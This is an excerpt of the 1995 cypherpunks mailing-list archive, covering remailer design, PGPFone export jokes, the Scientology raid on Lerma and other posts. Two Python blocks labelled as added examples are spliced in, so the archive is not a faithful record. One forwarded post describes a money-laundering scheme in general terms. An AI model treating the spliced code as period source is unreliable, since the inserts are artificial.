make sure it is up, so that mail isn't sitting in the queue.  All chained
mail should also be encrypted. 

5)  Encryption/Signature Validation
Any message that is emailed PGP signed should be validated by the remailer
(with the User having to email in their public key as part of the
registration process, if they so choose, or remailers can use the
keyserver).  If the signature is valid, a line is added in remailer
information section to the effect of "Message PGP Validated" and then sent
PGP signed by the remailer. (the original sender's PGP signature is
removed). 

An encrypted message should simply be PGP Signed by the final remailer 
posted/emailed to the destination

Because there are multiple remailers (chained), only the final remailer 
should sign the message.

6)  Two-way
This goes pretty much without saying.  If I send mail to somebody or post 
to news through a remailer, the person who received the message should be 
able to reply to my anonymous mailbox and I get the message (signed, of 
course, by the remailer).

7)  Option Validation
In order to change any of the options on your ID (ie, the expiration date
of your ID, or to expire it immediately, or to set the number of "hops" 
you want to chain through), you should have to submit a PGP Signed command
message.  Then, similar to a LISTSERV that confirms subscriptions and
unsubscriptions, a message is sent back asking you to "ok" these changes. 
This return message is sent as PGP encrypted email to your public key. 
When you decode it, you are given a, say, 10-digit code string that you need
to mail back to confirm the changes. If you don't, it doesn't.  

This helps keep down spoofing of messages changing your options without
your ok.  It's not perfect, and isn't totally secure, but it will catch
many.  In addition, you encourage the use of PGP by requiring it for
changing any options.  You can still use the remailer without PGP, but you
can't access the options and are stuck with the defaults. 

However, one item that should not be allowed to be changed is your email 
address.  If you move from foo@blah.com to blah@foo.com, you need to get 
a new ID, and expire the old one (or it will die by itself within a 
year). 

8)  Robust Web of Remailers
Remailers come and go daily.  Any pseudo-anonymous remailer web needs to
be able to handle that fact.  Thus, a mechanism needs to be put into place
to allow for easy adding of a new machine (if it's easy, more people will
do it) with minimal maintenance.  In addition, if a remailer disappears
(say, because somebody caught wind of it and ordered the student to turn
it off :-), the rest of the remailer web needs to be able to survive.  Of
course, that particular address will be dead, but with appropriate FAQs
posted around, people should be able to quickly find another address that
uses the same database. 

9)  Proper PR
This needs to be properly advertised as well.  Penet.fi, whether good or 
bad, has a reputation of being a breeding ground for law-breakers.  Any 
web set up needs to be pushed as nothing more than a "P.O. Box" on the 
Internet or some such.  In reality, nothing is different, but in the 
public light, it would work better.

10)  There is no number 10

=====================

Hmm, guess that's about it.  Comments are appreciated (really they are :-)

 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------
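
One way to implement the confirmation loop from item 7, with the lifetime and hop limits from items 3 and 4, as an added example that is not part of the original post. `NymServer`, the `key=value` command syntax, the 24-hour pending window and the `verify_sig`/`encrypt_to` callables (stand-ins for PGP verification and encryption) are assumptions.

```python
"""Added example: signed option change, confirmed by a mailed-back code."""
import hmac
import secrets
import time

LIFETIME_MONTHS = {3, 6, 12}   # item 3: 3-month option, 6 default, 12 maximum
HOPS = range(1, 21)            # item 4: user-definable from 1 to 20 hops
DEFAULTS = {"lifetime_months": 6, "hops": 3}
PENDING_TTL = 24 * 3600        # assumption: the post names no time limit


class NymServer:
    def __init__(self, verify_sig, encrypt_to, now=time.time):
        # verify_sig(nym, text, sig) -> bool and encrypt_to(nym, text) -> bytes
        # are hypothetical stand-ins for PGP verification and encryption.
        self.verify_sig, self.encrypt_to, self.now = verify_sig, encrypt_to, now
        self.options = {}      # nym -> current options
        self.pending = {}      # nym -> (code, requested changes, deadline)

    def register(self, nym):
        self.options[nym] = dict(DEFAULTS)

    @staticmethod
    def parse(command):
        """Parse 'key=value' lines; reject unknown keys and bad values."""
        allowed = {"hops": HOPS, "lifetime_months": LIFETIME_MONTHS}
        changes = {}
        for line in command.strip().splitlines():
            key, _, value = (part.strip() for part in line.partition("="))
            if (key in allowed and value.isascii() and value.isdigit()
                    and int(value) in allowed[key]):
                changes[key] = int(value)
            else:
                # Also covers 'email': item 7 forbids changing the address.
                raise ValueError(f"rejected option line: {line!r}")
        if not changes:
            raise ValueError("empty command")
        return changes

    def request_change(self, nym, command, signature):
        """Step 1: signed command in, encrypted confirmation code out."""
        if nym not in self.options or not self.verify_sig(nym, command, signature):
            raise PermissionError("unsigned or badly signed command")
        changes = self.parse(command)
        code = f"{secrets.randbelow(10**10):010d}"   # the post's 10-digit string
        self.pending[nym] = (code, changes, self.now() + PENDING_TTL)
        return self.encrypt_to(nym, code)

    def confirm(self, nym, code):
        """Step 2: apply the change only if the mailed-back code matches."""
        entry = self.pending.pop(nym, None)   # single use, right or wrong
        if entry is None:
            return False
        expected, changes, deadline = entry
        # Constant-time comparison; bytes so non-ASCII input cannot raise.
        matches = hmac.compare_digest(expected.encode(), code.encode())
        if self.now() > deadline or not matches:
            return False
        self.options[nym].update(changes)
        return True
```

Dropping the pending entry on the first wrong code is a hardening choice added here: a spoofer gets one guess at the 10-digit string per signed request.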




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Germano Caronni <caronni@tik.ee.ethz.ch>
Date: Sun, 13 Aug 95 13:03:53 PDT
To: cypherpunks@toad.com
Subject: SKIP (Security on the IP Layer) Sources
Message-ID: <199508132003.WAA02584@ktik6>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Hello everybody,
I am not in the cyberpunks mailing list, but I feel you might perhaps be
interested in this:

the Swiss version of SKIP is now available as a pre-alpha source code release
for IRIX, NetBSD, Nextstep and Solaris.
You may get it from ftp://ktik0.ethz.ch/~ftp/pub/packages/skip.

Have fun,
    Germano


Excerpt from the README:
========================================================================
This is ENskip, pre-alpha 0.10. ENskip is a security module for the TCP/IP
stack. It provides encryption, authentication and sequencing of packets on
the IP layer between two or more machines. For more information on the SKIP
protocol, see the Internet Draft draft-ietf-ipsec-aziz-skip-00.txt and
following. You might also want to check http://skip.incog.com for information
about the background, the protocol itself and future directions of it.

ENskip is pre-alpha. If you are not absolutely sure what this is all about,
you might want to read the draft, and perhaps reconsider using this package.

No bug-fixes, installation help or any other support is granted. If you
have any suggestions, comments or contributions to make ENskip work better,
mail to skip@tik.ee.ethz.ch.

Enjoy!

M. Hauber and Ch. Schneider
G. Caronni
=======================================================================


- -- 
<...cookie space for rent...>

Germano Caronni    caronni@tik.ee.ethz.ch    http://www.tik.ee.ethz.ch/~caronni
PGP-Key-ID:7B7AE5E1                            997C6DC4AF930A5D2D5D6AEAA196C33B




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 14 Aug 95 01:26:37 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
Message-ID: <199508140823.BAA14036@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:20 PM 8/13/95 -0400, you wrote:
>I bet e$50 that PGPFone will have been exported 24 hours after its final
>release has been announced to this list. Who is willing to take the bet?
>Perhaps someone is willing to bet at less time?

Not a chance I'd take this bet!
1) My e$ haven't arrived....
2) If there were a serious risk of you losing, I know you're a good
law-abiding guy, but you might have a "friend" who would help you out by
exporting it in a hurry :-)
3) 24 hours sounds like a reasonably safe upper limit for the export time.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Mon, 14 Aug 95 02:00:21 PDT
To: cypherpunks@toad.com
Subject: Re: Bet e$ on how long it will take for PGPFone to make it  overseas!
Message-ID: <199508140859.BAA15661@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<giggles>
24 minutes was a more reasonably safe upper limit.
I just wondered why Alex got to have all the fun!
Maybe I should move across the water or something?
</giggles>

>3) 24 hours sounds like a reasonably safe upper limit for the export time.
># Bill Stewart, Freelance Information Architect
<sadness>
RIP, Mick
RIP, Jerry
</sadness>

Love Always,

Carol Anne

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Mon, 14 Aug 95 03:05:35 PDT
To: cypherpunks@toad.com
Subject: How to launder money (internationally) (fwd)
Message-ID: <ZLwLw4NQn0ER084yn@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-------- Forwarded message --------
Date:      Sat, 12 Aug 1995 13:37:24 est
From:      Gary Livermore <gary.livermore@p4.f507.n300.z1.aen.org>
To:        Multiple recipients of list CHAT <CHAT@AEN.ORG>
Subject:   How to launder money (internationally)

How dirty drug money is laundered internationally:
[From National Geographic, Vol.183, No.1 Jan.1993, pg105]
Titled: The Power of Money, by Peter T White, Asst. Editor,
quoting his sources as the "Centre for International
Documentation of Organized and Economic Crime," located
in Cambridge, England.

[begin this section]
==================================================================
This is a real-life example:

A U.S. organized crime group with a lot of hot cash forms a cozy
relationship with the central bank of a British Commonwealth
country.  Diplomats of that country carry the cash out of the
U.S.  If it's $10,000 or more, they are supposed to report that
to U.S. Customs, but they don't; they "externalize" the cash.
It goes into the central bank and then into various dummy companies
in different countries in return for shares in those companies.
The money is thus "agitated," so it'll be just about impossible for
investigators to follow.  Then, to "repatriate" the money, dummy
companies in the U.S. sell their worthless shares to investors in
Britain - who are in fact in on the scam - and behold, the money
is back in the U.S., clean!  Now it buys legitimate businesses,
banks, political power.

An operation like this, involving highly placed officials, and
businessmen, will cost quite a bit, maybe 35 percent, but once
the system is in place, people will want to use it - not only
drug profiteers but also arms dealers, terrorist organizations,
intelligence agencies...

A prime haven for such shady customers was BCCI, the Bank of
Credit and Commerce International, headquartered in Luxembourg
and the Cayman Islands with branches in 72 countries.  It is said
to have secretly controlled the First American Bank of Washington, D.C.
After BCCI collapsed in 1991, having defrauded depositors of several
billion dollars, it became known as the Bank of Crooks and
Criminal International.
=================================================================
[End, this section]
Can you say Mena - Clinton - Whitewater, 3 times real fast?!?

In the very next section, there is an interesting little number
used by the bank/finance crowds, it's number "72".

[begin this section]
===========================================================
- the rule of 72.  No one is certain who first developed the rule,
but the principle is quite simple:  Divide any number into 72  and
the answer tells how long it will take for a sum to double in
financial terms.

Are you charged 18 percent interest on the unpaid balance of your
credit card account?  Eighteen goes into 72 four times - so the
debt would double in four years.  Say your annual raise is 6
percent; that number goes into 72 twelve times, so in twelve
years your salary will double.  The same holds true of any
investment.  And what if inflation runs at 6 percent a year?
Then after a dozen years your money will be worth half as much,
so in a sense you'll be back where you started.
===============================================================
[end this section]

Gee, now I wonder if the money-changers figured this into
setting annual inflation rates!  Kind of keeps the middle
class down, and stuck in a rut.

*****My footer*********************************************************
"We conclude that the Reserve Banks are not federal instrumentalities
for purposes of the FTCA (Federal Tort Claims Act), but are independent,
privately owned and locally controlled corporations"
                                Lewis v. U.S. F.2d  (1982)
***********************************************************************

... Those who follow like sheep deserve to get fleeced.

--- PPoint 1.92
 * Origin: Arizona's West Coast. My Point, Exactly! (1:300/507.4)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Mon, 14 Aug 95 03:05:37 PDT
To: cypherpunks@toad.com
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
In-Reply-To: <199508140120.VAA24979@bb.hks.net>
Message-ID: <GSwLw4NQns/I084yn@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


In article <199508140120.VAA24979@bb.hks.net>,
shamrock@netcom.com (Lucky Green) wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>To loosen up the often so serious discussions on the list, I propose a
>little game. PGPFone's release is about a week away. PRZ is trying his
>hardest to keep it from being exported. Still, I have the feeling that
>some irresponsible cyphercriminal will break US law and export PGPFone
>anyway. Let us bet cyberbucks on how long it will take for this crime to
>happen. Here is my initial offer:

>I bet e$50 that PGPFone will have been exported 24 hours after its final
>release has been announced to this list. Who is willing to take the bet?
>Perhaps someone is willing to bet at less time?

I don't bet money but I'd bet a debit note of 1U$ that it'll happen after
it appears in someone's home directory, is multiply encrypted and
anonymously mailed. I give it about 78msec after the receiver's local
hardware is done crunching for it to be on its way. ;-)

I say substantially less than 24hrs...

Ayep.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 14 Aug 95 06:50:48 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199508141350.GAA22629@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 14 Aug 95 6:00:15 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
spook    remailer@spook.alias.net         **-*+--+---   1:32:10  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           +#**-#####*#     4:15  99.98%
portal   hfinney@shell.portal.com         #******#.-*#  1:42:00  99.98%
replay   remailer@replay.com              ************     9:36  99.97%
alumni   hal@alumni.caltech.edu           ****-***.-*#  2:05:47  99.97%
hacktic  remailer@utopia.hacktic.nl       ************    11:33  99.95%
crown    mixmaster@kether.alias.net       -----------   2:07:40  99.95%
rmadillo remailer@armadillo.com           +-+**++**     1:06:24  99.95%
vox      remail@vox.xs4all.nl             ....-.-.---  14:52:58  99.99%
penet    anon@anon.penet.fi               -++*++++++*+  1:45:24  99.76%
hroller  hroller@c2.org                   #**+*---##*     35:04  99.65%
syrinx   syrinx@c2.org                    -----------   2:30:12  99.61%
mix      mixmaster@remail.obscura.com     --------++-   2:30:54  99.53%
c2       remail@c2.org                    +++-+---+++   1:24:36  99.49%
flame    remailer@flame.alias.net         ++++++++++++    51:10  99.11%
vishnu   mixmaster@vishnu.alias.net        **------ -   2:38:17  98.91%
ideath   remailer@ideath.goldenbear.com   .--_.---.-    7:32:04  98.59%
gondolin mixmaster@gondolin.org           +***+ +*--*-  1:03:25  98.52%
ford     remailer@bi-node.zerberus.de     **-** ***#*#     5:31  96.93%
rahul    homer@rahul.net                  ++**+#*##**#     3:42  99.99%
extropia remail@extropia.wimsey.com       -.-.-...     21:12:59  83.13%
rebma    remailer@rebma.mn.org            ..---+--      9:53:43  68.81%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
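
The listing format in the message above (the $remailer capability lines plus the ping table), parsed and filtered the way a chaining client could use it. This is an added example, not part of the original post and not premail's own code; the function names, the selection thresholds, and the reading of two-field latencies such as "4:15" as minutes:seconds are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Sample input: a subset of the lines from the listing above, copied unchanged.
SAMPLE = r'''
$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
bsu-cs   nowhere@bsu-cs.bsu.edu           +#**-#####*#     4:15  99.98%
portal   hfinney@shell.portal.com         #******#.-*#  1:42:00  99.98%
replay   remailer@replay.com              ************     9:36  99.97%
vox      remail@vox.xs4all.nl             ....-.-.---  14:52:58  99.99%
penet    anon@anon.penet.fi               -++*++++++*+  1:45:24  99.76%
vishnu   mixmaster@vishnu.alias.net        **------ -   2:38:17  98.91%
ford     remailer@bi-node.zerberus.de     **-** ***#*#     5:31  96.93%
rahul    homer@rahul.net                  ++**+#*##**#     3:42  99.99%
rebma    remailer@rebma.mn.org            ..---+--      9:53:43  68.81%
'''

CAPS_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";')
LATENCY_RE = re.compile(r'\d+(:\d\d){1,2}')


@dataclass
class Remailer:
    name: str
    address: str
    caps: Set[str]
    pgp_key_id: Optional[str]      # None when the remailer has no PGP support
    history: str = ""
    latency_s: Optional[int] = None
    uptime: Optional[float] = None


def parse_latency(text: str) -> int:
    """'1:32:10' -> h:m:s, '4:15' -> m:s (assumed), result in seconds."""
    seconds = 0
    for part in text.split(":"):
        seconds = seconds * 60 + int(part)
    return seconds


def parse_listing(text: str) -> Dict[str, Remailer]:
    remailers: Dict[str, Remailer] = {}
    for line in text.splitlines():
        m = CAPS_RE.match(line.strip())
        if m:
            name, address, flags = m.group(1), m.group(2), m.group(3).split()
            # "pgp." means the short name is the key ID, plain "pgp" the address.
            key_id = name if "pgp." in flags else address if "pgp" in flags else None
            caps = {f.rstrip(".") for f in flags}
            remailers[name] = Remailer(name, address, caps, key_id)
            continue
        tok = line.split()
        # Ping-table row. The history column may contain blanks (missed pings),
        # so take latency and uptime from the right and join what is left.
        if (len(tok) >= 4 and "@" in tok[1] and tok[-1].endswith("%")
                and LATENCY_RE.fullmatch(tok[-2])):
            r = remailers.get(tok[0])
            if r is None or r.address != tok[1]:
                continue  # row does not match a declared remailer: ignore it
            r.history = " ".join(tok[2:-2])
            r.latency_s = parse_latency(tok[-2])
            r.uptime = float(tok[-1].rstrip("%"))
    return remailers


def chain_candidates(remailers: Dict[str, Remailer],
                     required=frozenset({"cpunk", "pgp"}),
                     avoid=frozenset({"mon", "filter"}),
                     min_uptime: float = 99.0,
                     max_latency_s: int = 4 * 3600) -> List[str]:
    """Names of remailers usable as encrypted hops, fastest first.
    Thresholds are illustrative assumptions, not values from the listing."""
    ok = [r for r in remailers.values()
          if r.uptime is not None and r.latency_s is not None
          and required <= r.caps and not (avoid & r.caps)
          and r.uptime >= min_uptime and r.latency_s <= max_latency_s]
    return [r.name for r in sorted(ok, key=lambda r: r.latency_s)]


if __name__ == "__main__":
    listing = parse_listing(SAMPLE)
    for name in chain_candidates(listing):
        r = listing[name]
        print(name, r.address, "encrypt to key ID:", r.pgp_key_id)
```

With these thresholds, rahul is dropped despite the best latency and uptime because it carries the filter flag, and vox is dropped on latency alone.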




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Mon, 14 Aug 95 07:44:59 PDT
To: cypherpunks@toad.com
Subject: E-Systems Digitrac 6700
Message-ID: <199508141444.HAA15938@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May writes:

>It gets back to the threat model. If the threat model is
>interception by the neighborhood kids, then schemes for
>frequency-hopping, scrambling, "warbling," and PhasorPhone-like
>diddling are OK. If the threat model is the local police
>department tapping one's phone, probably not enough, as they
>likely can gain access to the E-Systems DigiTrac 6700 and
>trivially unscramble the signal.

Ok, I'll take the bait. What else can you tell us about the
E-Systems Digitrac 6700?

"enquiring" minds want to know.......;)

Brian D Williams
Cypherpatriot




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Mon, 14 Aug 95 06:05:37 PDT
To: cypherpunks@toad.com
Subject: premail www interface
Message-ID: <199508141305.IAA19498@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I have worked the kinks out and now announce the premail www interface.
The interface uses premail to send your mail anonymously without fuss or
muss.  If you are not familiar with premail, check the page out and see
what it is all about.  You can find the premail script on Raph's pinging
page.

The interface should be bug free, but if you find any, let me know.  I
welcome comments/flames/criticisms.  If there are suggestions for upgrades
or future ideas, let me know.

The cpremailer that I have up is still there.  These two www interfaces
should serve many people well.  The suggestions I received for the
cpremailer have been implemented so that you, the user, select the number
of remailers to use.  No more hardwiring and there is nothing that forces
you to chain.

http://miso.wwa.com/~dochobbs/premail.html   <-premail interface
http://miso.wwa.com/~dochobbs/cpremailer.html  <-  nate's www remailer

If anyone has designed a similar remailer interface for premail, let me
know. I would like to know how you did it differently. 

Of course this email is coming to you from the premail gate.

Michael Hobbs
dochobbs@wwa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 14 Aug 95 06:28:43 PDT
To: remailer-operators@c2.org (Remailer Operators List)
Subject: CoS Raid on "Copyright Terrorist"
Message-ID: <9508141328.AA22188@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Some CoS news:

This past Saturday (95/08/12) a prominent Church of Scientology litigator,
Helena Kobrin, and some U.S. federal marshals raided the home of Arnaldo
Lerma, seizing pretty much all his computer hardware, disks, etc. It seems
that back in 1993, CoS was suing someone named Steven Fishman. As part of the
legal proceedings he filed a "declaration", which routinely became part of 
the public record of the business of the court. This happens to have included
some of the OT documents which the CoS claims as both copyrighted trade 
secrets and sacred texts.

As with other unsealed court documents, copies of the Fishman declaration are
available by snail mail from the court for 50 cents/page. Lerma ordered a
copy from the court, then posted it to alt.religion.scientology. Now CoS is
claiming copyright infringement. Helena Kobrin apparently wants to advance the
state of the art in Infocalypse hyperbole; she is quoted in a wire service
story as saying, in reference to Lerma's posting,

	"What he was engaging in was a form of copyright terrorism"

Meanwhile, various sites have started carrying copies of the Fishman 
declaration, made available by http, ftp, gopher, finger, etc. A site in
China was one of these data havens, until the resultant traffic load forced it
to shut down. David Touretzky, a member of the CS faculty at Carnegie-Mellon, 
had a complete copy on his Web pages at http://www.cs.cmu.edu/~dst/Fishman/ 
until CMU's legal counsel received a fax from Helena Kobrin, demanding their
removal.

Pending review by the CMU legal staff, he has taken them off. However,
he is maintaining a list of links to sites that still carry copies of
the declaration, along with pointers to some other relevant sites, and his
own comments on the situation.  Apparently quite a few other a.r.s folks
and their ISPs have received similar warning letters from HKK. Someone did
a fairly competent forgery on a.r.s of a version of the warning letter,
purportedly from Helena Kobrin to the entire net. I found it disturbingly
plausible. Also, someone forged cancels of various articles including parts of
the Fishman declaration, and of at least one which quoted no more than 
Touretzky's URL. 

A couple of other interesting sources for information on the Scientology/Net 
situation I've found recently are: http://amazing.cinenet.net/scientology.html
                               and http://www.clark.net/pub/jcblal/jcbcos.html

Freedom Magazine Vol 27, Issue 4, published by the CoS RTC, has some articles
online dealing with copyright, anonymity, privacy, and cryptography. As I've 
said before, I'm scared of getting slapped with a frivolous lawsuit by some 
arm of the CoS, so I won't quote anything from the articles. Perhaps some of
the other vocal people on the list who think CoS wouldn't hurt a fly will
distribute some choice Fair Use quotes.

http://www.theta.com/goodman/hijack.htm argues for pre-emption of new govt.
regulation of anonymity on the net by application of existing law, although
it fails to recognize some of the protections for anonymity in said law. It
also quotes some criticism by Bruce Koball of the 40-bit export restriction
on RC4, and Clipper. The article editorializes against govt. suppression of
strong crypto.

http://www.theta.com/goodman/lies.htm is entitled "Solutions to On-Line Lies",
and advocates forcing remailer operators to know the identities of their
users/customers, and holding them liable for the content of remailed messages.
It generally urges intolerance of unpopular online speech, and remarkably
laments Microsoft's inability to sue for defamation over the Microsoft-to-buy-
Catholic-Church spoof.

http://www.theta.com/goodman/crime.htm offers some case histories of 
net.criminals (according to them), including Kevin Mitnick, some guys accused
of rape (stuck under the moniker of `child pornographers'), and Dennis 
Ehrlich, subject of a CoS-inspired February raid by the copyright police. The
juxtaposition of these figures is strikingly absurd.  

There's more, but this should give you a taste for what's there.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 14 Aug 95 06:29:58 PDT
To: cypherpunks@toad.com
Subject: Data Secrecy Rift
Message-ID: <199508141329.JAA02054@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


This seems worth posting in full:

----------

   The New York Times, August 14, 1995, pp. D1, D8.


   Rift Emerges Over Computer Data Secrecy Issue

   By John Markoff


   Some of the biggest names in the computer industry sent
   separate letters to the White House last week in
   pre-emptive moves aimed at a proposed regulation originally
   intended to insure that law-enforcement officials have
   access to encoded telephone and computer communications.
   The proposal may be released as soon as this week.

   But as the Government's task force on the encryption issue
   prepared to disclose the closely held details of the
